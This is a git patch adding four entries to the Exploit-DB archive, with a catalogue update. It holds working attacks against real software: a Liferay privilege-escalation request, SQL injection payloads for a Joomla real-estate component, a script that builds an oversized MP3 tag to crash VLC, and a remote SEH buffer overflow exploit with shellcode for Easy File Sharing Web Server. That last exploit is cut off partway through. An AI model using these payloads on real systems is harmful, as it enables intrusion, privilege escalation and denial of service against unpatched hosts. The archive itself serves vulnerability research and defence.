From a3e2d9b7a287d32b0b8a25914987502c771a23ed Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 25 Oct 2015 05:03:17 +0000 Subject: [PATCH] DB: 2015-10-25 4 new exploits --- files.csv | 4 ++ platforms/php/webapps/38443.txt | 41 ++++++++++++++ platforms/php/webapps/38445.txt | 58 ++++++++++++++++++++ platforms/windows/dos/38485.py | 42 +++++++++++++++ platforms/windows/remote/38526.py | 90 +++++++++++++++++++++++++++++++ 5 files changed, 235 insertions(+) create mode 100755 platforms/php/webapps/38443.txt create mode 100755 platforms/php/webapps/38445.txt create mode 100755 platforms/windows/dos/38485.py create mode 100755 platforms/windows/remote/38526.py diff --git a/files.csv b/files.csv index c26ff7aef..0e2b8b28c 100755 --- a/files.csv +++ b/files.csv @@ -34727,7 +34727,9 @@ id,file,description,date,author,platform,type,port 38439,platforms/php/webapps/38439.txt,"WordPress Traffic Analyzer Plugin 'aoid' Parameter Cross Site Scripting Vulnerability",2013-04-09,Beni_Vanda,php,webapps,0 38440,platforms/php/webapps/38440.txt,"phpMyAdmin 'tbl_gis_visualization.php' Multiple Cross Site Scripting Vulnerabilities",2013-04-09,waraxe,php,webapps,0 38441,platforms/php/webapps/38441.txt,"WordPress Spiffy XSPF Player Plugin 'playlist_id' Parameter SQL Injection Vulnerability",2013-04-10,"Ashiyane Digital Security Team",php,webapps,0 +38443,platforms/php/webapps/38443.txt,"Liferay 6.1.0 CE - Privilege Escalation",2015-10-11,"Massimo De Luca",php,webapps,0 38444,platforms/win32/dos/38444.py,"Tomabo MP4 Converter 3.10.12 - 3.11.12 (.m3u) Denial of service (Crush application)",2015-10-11,"mohammed Mohammed",win32,dos,0 +38445,platforms/php/webapps/38445.txt,"Joomla Real Estate Manager Component 3.7 - SQL injection",2015-10-11,"Omer Ramić",php,webapps,0 38446,platforms/php/webapps/38446.html,"Dream CMS 2.3.0 - CSRF Add Extension And File Upload PHP Code Execution",2015-10-11,LiquidWorm,php,webapps,0 38448,platforms/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - File Path Traversal Vulnerability",2015-10-13,"Karn Ganeshen",hardware,webapps,0 38449,platforms/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps,0 @@ -34761,6 +34763,7 @@ id,file,description,date,author,platform,type,port 38482,platforms/php/webapps/38482.txt,"Crafty Syntax Live Help <= 3.1.2 Remote File Include and Path Disclosure Vulnerabilities",2013-04-19,ITTIHACK,php,webapps,0 38483,platforms/hardware/dos/38483.txt,"TP-LINK TL-WR741N and TL-WR741ND Routers Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,hardware,dos,0 38484,platforms/php/webapps/38484.rb,"Wordpress Ajax Load More Plugin < 2.8.2 - File Upload Vulnerability",2015-10-18,PizzaHatHacker,php,webapps,0 +38485,platforms/windows/dos/38485.py,"VLC 2.2.1 libvlccore - (.mp3) Stack Overflow",2015-10-18,"Andrea Sindoni",windows,dos,0 38486,platforms/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow",2015-10-18,"yokoacc, nudragn, rungga_reksya",windows,local,0 38487,platforms/php/webapps/38487.txt,"WordPress Colormix Theme Multiple Security Vulnerablities",2013-04-21,MustLive,php,webapps,0 38488,platforms/hardware/webapps/38488.txt,"Belkin Router N150 1.00.08_ 1.00.09 - Path Traversal Vulnerability",2015-10-19,"Rahul Pratap Singh",hardware,webapps,0 @@ -34800,5 +34803,6 @@ id,file,description,date,author,platform,type,port 38523,platforms/php/webapps/38523.txt,"Weyal CMS Multiple SQL Injection Vulnerabilities",2013-05-23,XroGuE,php,webapps,0 38524,platforms/php/webapps/38524.pl,"Matterdaddy Market Multiple Security Vulnerabilities",2013-05-24,KedAns-Dz,php,webapps,0 38525,platforms/php/webapps/38525.txt,"Subrion 3.X.X - Multiple Vulnerabilities",2015-10-23,bRpsd,php,webapps,0 +38526,platforms/windows/remote/38526.py,"Easy File Sharing Web Server 7.2 - Remote SEH Based Overflow",2015-10-23,Audit0r,windows,remote,0 38527,platforms/php/webapps/38527.txt,"Realtyna RPL Joomla Extension 8.9.2 - Multiple SQL Injection Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0 38528,platforms/php/webapps/38528.txt,"Realtyna RPL Joomla Extension 8.9.2 - Persistent XSS And CSRF Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0 diff --git a/platforms/php/webapps/38443.txt b/platforms/php/webapps/38443.txt new file mode 100755 index 000000000..581776885 --- /dev/null +++ b/platforms/php/webapps/38443.txt @@ -0,0 +1,41 @@ +# Exploit Title: Liferay 6.1.0 CE GA1 Privilege Escalation +# Date: 18/05/2015 +# Exploit Author: Massimo De Luca - mentat.is +# Vendor Homepage: https://www.liferay.com +# Software Link: +http://www.liferay.com/it/community/releases/-/asset_publisher/nSr2/content/id/18060360 +# Version: 6.1.0 CE +# Tested on: - + +Explanation: +Any logged user can change his "User Group" membership by editing the +parameter _2_userGroupsSearchContainerPrimaryKeys in the HTTP POST REQUEST +generated when updating his profile in the page "Manage my account". This +may lead to privilege escalation. + + +Proof of Concept: + +POST +/group/control_panel/manage?p_auth=J3jbveH7&p_p_id=2&p_p_lifecycle=1&p_p_state=maximized&p_p_mode=view&doAsGroupId=19&refererPlid=10839&controlPanelCategory=my&_2_struts_action=%2Fmy_account%2Fedit_user +HTTP/1.1 +[...] +[...]_2_organizationsSearchContainerPrimaryKeys=&_2_groupsSearchContainerPrimaryKeys=19&_2_userGroupsSearchContainerPrimaryKeys=[NEW +GROUP ID]&_2_groupRolesRoleIds=[...] + + +For your reference i'm attaching the full request in a separate file. + +In order to test the vulnerability on a fresh installation: +- Create two different groups with different roles and permissions (ie: +one with administrator permissions, and a regular user) +-Create two different users,one for each group + +Solution: +The vendor is aware of the problem and has fixed the issue in newer +releases + + +#Massimo De Luca +#mdeluca [at] mentat.is +#Mentat.is \ No newline at end of file diff --git a/platforms/php/webapps/38445.txt b/platforms/php/webapps/38445.txt new file mode 100755 index 000000000..bae3035e4 --- /dev/null +++ b/platforms/php/webapps/38445.txt @@ -0,0 +1,58 @@ +# Description of component: +This Joomla component is perfect for independent estate agents, property +rental companies and agencies, hotel booking, hotel manage, motel booking, +motel manage. + +################################################################################################## +# Exploit Title: [Joomla component com_realestatemanager - SQL injection] +# Google Dork: [inurl:option=com_realestatemanager] +# Date: [2015-10-10] +# Exploit Author: [Omer Ramić] +# Vendor Homepage: [http://ordasoft.com/] +# Software Link: [http://ordasoft.com/Real-Estate-Manager-Software-Joomla.html] +# Version: [3.7] & probably all prior +#Tested on: Linux/Windows/PHP 5.5.28/Apache 2.4.16 +################################################################################################## + +#Multiple vulnerable parameters (POC given only for the first parametar): +Parameter_1: order_direction (POST) +Parameter_2: order_field (POST) + + +#The vulnerable parameters 1 & 2 are within the following request: +POST +/index.php?option=com_realestatemanager&task=showCategory&catid=50&Itemid=132 +HTTP/1.1 +Host: [HOST] +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 +Firefox/38.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http:// +[HOST]/index.php?option=com_realestatemanager&task=showCategory&catid=50&Itemid=132 +Cookie: security_level=0; +9d929655f6556b9fb49bf0e118bafb11=tp72u418eemk6jdvvnctoamna0; countrytabs=0 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 37 + +order_direction=asc&order_field=price + + + +#Vectors: +POC_1: order_direction=asc,(SELECT (CASE WHEN (7918=7918) THEN 1 ELSE +7918*(SELECT 7918 FROM INFORMATION_SCHEMA.CHARACTER_SETS) +END))&order_field=price + +POC_2: order_direction=asc,(SELECT 1841 FROM(SELECT +COUNT(*),CONCAT(0x716b787671,(SELECT +(ELT(1841=1841,1))),0x716b786b71,FLOOR(RAND(0)*2))x FROM + +INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_field=price + + +################################### +# Greets to Palestine from Bosnia # +################################### diff --git a/platforms/windows/dos/38485.py b/platforms/windows/dos/38485.py new file mode 100755 index 000000000..08581eb96 --- /dev/null +++ b/platforms/windows/dos/38485.py @@ -0,0 +1,42 @@ +# Exploit Title: VLC | libvlccore - (.mp3) Stack Overflow +# Date: 18/10/2015 +# Exploit Author: Andrea Sindoni +# Software Link: https://www.videolan.org/vlc/index.it.html +# Version: 2.2.1 +# Tested on: Windows 7 Professional 64 bits +# +# PoC with MP3: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38485.zip +# + +#APP: vlc.exe +#ANALYSIS_VERSION: 6.3.9600.17336 (debuggers(dbg).150226-1500) amd64fre +#FOLLOWUP_NAME: MachineOwner +#MODULE_NAME: libvlccore +#IMAGE_NAME: libvlccore.dll +#FAILURE_ID_HASH_STRING: um:wrong_symbols_c00000fd_libvlccore.dll!vlm_messageadd +#Exception Hash (Major/Minor): 0x60346a4d.0x4e342e62 +#EXCEPTION_RECORD: ffffffffffffffff -- (.exr 0xffffffffffffffff) +#ExceptionAddress: 00000000749ba933 (libvlccore!vlm_MessageAdd+0x00000000000910d3) +# ExceptionCode: c00000fd (Stack overflow) +# ExceptionFlags: 00000000 +#NumberParameters: 2 +# Parameter[0]: 0000000000000001 +# Parameter[1]: 0000000025ed2a20 +# +#eax=00436f00 ebx=2fdc0100 ecx=25ed2a20 edx=00632efa esi=17fb2fdc edi=00000001 +#eip=749ba933 esp=260cfa14 ebp=260cfa78 iopl=0 nv up ei pl nz na po nc +#cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 +# +#Stack Overflow starting at libvlccore!vlm_MessageAdd+0x00000000000910d3 (Hash=0x60346a4d.0x4e342e62) +# + +import eyed3 + +value = u'B'*6500000 + +audiofile = eyed3.load("base.mp3") +audiofile.tag.artist = value +audiofile.tag.album = u'andrea' +audiofile.tag.album_artist = u'sindoni' + +audiofile.tag.save() diff --git a/platforms/windows/remote/38526.py b/platforms/windows/remote/38526.py new file mode 100755 index 000000000..8a22985bb --- /dev/null +++ b/platforms/windows/remote/38526.py @@ -0,0 +1,90 @@ +#!/usr/bin/env python +# Easy File Sharing Web Server v7.2 Remote SEH Based Overflow +# The buffer overwrites ebx with 750+ offset, when sending 4059 it overwrites the EBX +# vulnerable file /changeuser.ghp > Cookies UserID=[buf] +# Means there are two ways to exploit changeuser.ghp +# Tested on Win7 x64 and x86, it should work on win8/win10 +# By Audit0r +# https://twitter.com/Audit0rSA + + +import sys, socket, struct + + +if len(sys.argv) <= 1: + print "Usage: python efsws.py [host] [port]" + exit() + +host = sys.argv[1] +port = int(sys.argv[2]) + + +# https://code.google.com/p/win-exec-calc-shellcode/ +shellcode = ( + +"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" + + +"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" + + +"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" + + +"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" + + +"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" + + +"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" + + +"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" + + +"\x1c\x39\xbd" + +) + +print "[+]Connecting to" + host + + +craftedreq = "A"*4059 + +craftedreq += "\xeb\x06\x90\x90" # basic SEH jump + +craftedreq += struct.pack("